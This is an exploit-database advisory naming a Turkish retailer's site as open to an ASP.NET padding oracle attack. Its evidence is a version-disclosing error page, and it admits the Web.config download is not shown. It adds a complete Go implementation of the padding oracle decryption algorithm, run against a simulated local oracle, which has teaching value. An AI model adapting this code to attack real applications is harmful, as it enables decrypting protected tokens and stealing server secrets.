istikbal Padding Oracle Vulnerability

2019.12.11
Risk: Medium
Local: No
Remote: Yes
CWE: N/A

Exploit Title: istikbal Padding Oracle Vulnerability
# Date: 10.12.2019
# Exploit Author: Furkan Özer // Prototyqe
# Vendor Homepage: istikbal.com.tr
# Version: ALL
# Tested on: Windows 10 / Linux Kali
***************************************************************************************************

This proof-of-concept exploit performs a padding oracle attack against a simple ASP.NET application (the technique is not specific to this application) to download a file from the remote web server. In this example the proof-of-concept downloads the Web.config file.

Request:

GET /WebResource.axd HTTP/1.1
Cookie: ASP.NET_SessionId=rsdw2kouuyhy2odwcpy1vi35
Host: www.istikbal.com.tr
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept: */*

poc (response, abridged by the author):

<!DOCTYPE html>
<html>
<head>
<title>The resource cannot be found.</title>
******
<b>Requested URL: </b>/WebResource.axd<br><br>
*********
<hr width=100% size=1 color=silver>
<b>Version Information:</b>&nbsp;Microsoft .NET Framework Version:4.0.30319; ASP.NET Version:4.7.3062.0
</font>

Note: the exchange reproduced above shows only that the WebResource.axd handler is present and that the error page discloses the .NET Framework and ASP.NET versions. A padding oracle is demonstrated by submitting a resource identifier whose ciphertext has been modified and observing that the server answers differently for a padding error than for any other decryption failure; that exchange, and the Web.config download itself, are not reproduced in this advisory.
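The advisory names the attack but does not show it, so the following is an added, self-contained simulation written for this page; it is not the author's proof-of-concept and not code from istikbal or cxsecurity. It models in Go what a CBC padding oracle attack does: a server side that issues AES-128-CBC tokens with PKCS#7 padding and leaks whether a submitted token decrypts to valid padding (here a plain bool; on a real target that is a differing error page, status code or timing), and an attacker side that recovers the plaintext block by block using nothing but that yes/no answer. The key, the sample secret and the oracle function are constructed for the example; no ASP.NET handler is contacted. The last-byte step handles the classic false positive where the preceding byte happens to decrypt to 0x02.

```go
package main

import (
	"bytes"
	"crypto/aes"
	"crypto/cipher"
	"crypto/rand"
	"errors"
)

const bs = aes.BlockSize

// Constructed AES-128 key of the simulated server; the attacker code never reads it.
var serverKey = []byte("0123456789abcdef")
var serverCipher, _ = aes.NewCipher(serverKey)

func pkcs7Unpad(b []byte) ([]byte, error) {
	if len(b) == 0 || len(b)%bs != 0 {
		return nil, errors.New("bad length")
	}
	p := int(b[len(b)-1])
	if p == 0 || p > bs || !bytes.Equal(b[len(b)-p:], bytes.Repeat([]byte{byte(p)}, p)) {
		return nil, errors.New("bad padding")
	}
	return b[:len(b)-p], nil
}

// Encrypt models the server issuing a token: IV || AES-CBC(PKCS#7(plain)).
func Encrypt(plain []byte) []byte {
	iv := make([]byte, bs)
	rand.Read(iv) // crypto/rand; error return ignored in this simulation
	p := bs - len(plain)%bs
	padded := append(append([]byte{}, plain...), bytes.Repeat([]byte{byte(p)}, p)...)
	out := make([]byte, len(padded))
	cipher.NewCBCEncrypter(serverCipher, iv).CryptBlocks(out, padded)
	return append(iv, out...)
}

// PaddingOracle models the leak: the server reveals whether the decrypted token had
// valid padding (distinct error page, status code or timing). The attacker calls only this.
func PaddingOracle(token []byte) bool {
	if len(token) < 2*bs || len(token)%bs != 0 {
		return false
	}
	pt := make([]byte, len(token)-bs)
	cipher.NewCBCDecrypter(serverCipher, token[:bs]).CryptBlocks(pt, token[bs:])
	_, err := pkcs7Unpad(pt)
	return err == nil
}

// decryptBlock recovers the plaintext of block target (preceded by prev) using only the oracle.
func decryptBlock(oracle func([]byte) bool, prev, target []byte) []byte {
	inter := make([]byte, bs) // D_k(target), learned from the right end leftwards
	fake := make([]byte, bs)  // attacker-chosen block sent in place of prev
	plain := make([]byte, bs)
	probe := func() bool { return oracle(append(append([]byte{}, fake...), target...)) }
	for pos := bs - 1; pos >= 0; pos-- {
		pad := byte(bs - pos)
		for j := pos + 1; j < bs; j++ {
			fake[j] = inter[j] ^ pad // force the already-known tail to decrypt to pad
		}
		found := false
		for g := 0; g < 256 && !found; g++ {
			fake[pos] = byte(g)
			if !probe() {
				continue
			}
			if pos == bs-1 { // a 0x01 hit is ambiguous if byte bs-2 already decrypts to 0x02:
				fake[pos-1] ^= 0xff // disturb that byte and re-query; only a real 0x01 survives
				ok := probe()
				fake[pos-1] ^= 0xff
				if !ok {
					continue
				}
			}
			inter[pos] = byte(g) ^ pad
			plain[pos] = inter[pos] ^ prev[pos]
			found = true
		}
		if !found {
			panic("oracle accepted no value: not a padding oracle?")
		}
	}
	return plain
}

// PaddingOracleDecrypt recovers the whole plaintext of an IV||ciphertext token.
func PaddingOracleDecrypt(oracle func([]byte) bool, token []byte) ([]byte, error) {
	if len(token) < 2*bs || len(token)%bs != 0 {
		return nil, errors.New("token must be an IV plus at least one block")
	}
	var out []byte
	for i := bs; i < len(token); i += bs {
		out = append(out, decryptBlock(oracle, token[i-bs:i], token[i:i+bs])...)
	}
	return pkcs7Unpad(out)
}
```

No main is included; exercise it from a test or a small main that calls PaddingOracleDecrypt(PaddingOracle, Encrypt(secret)). Wrapping PaddingOracle in a counting closure shows the cost: on average about 128 oracle queries per byte, never more than 16*256+2 per block, which is why the attack is practical over HTTP. The attacker never sees the key; everything it learns comes from the one-bit answer, which is the point the advisory is making about an application that distinguishes padding failures from other decryption failures.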


Copyright 2022, cxsecurity.com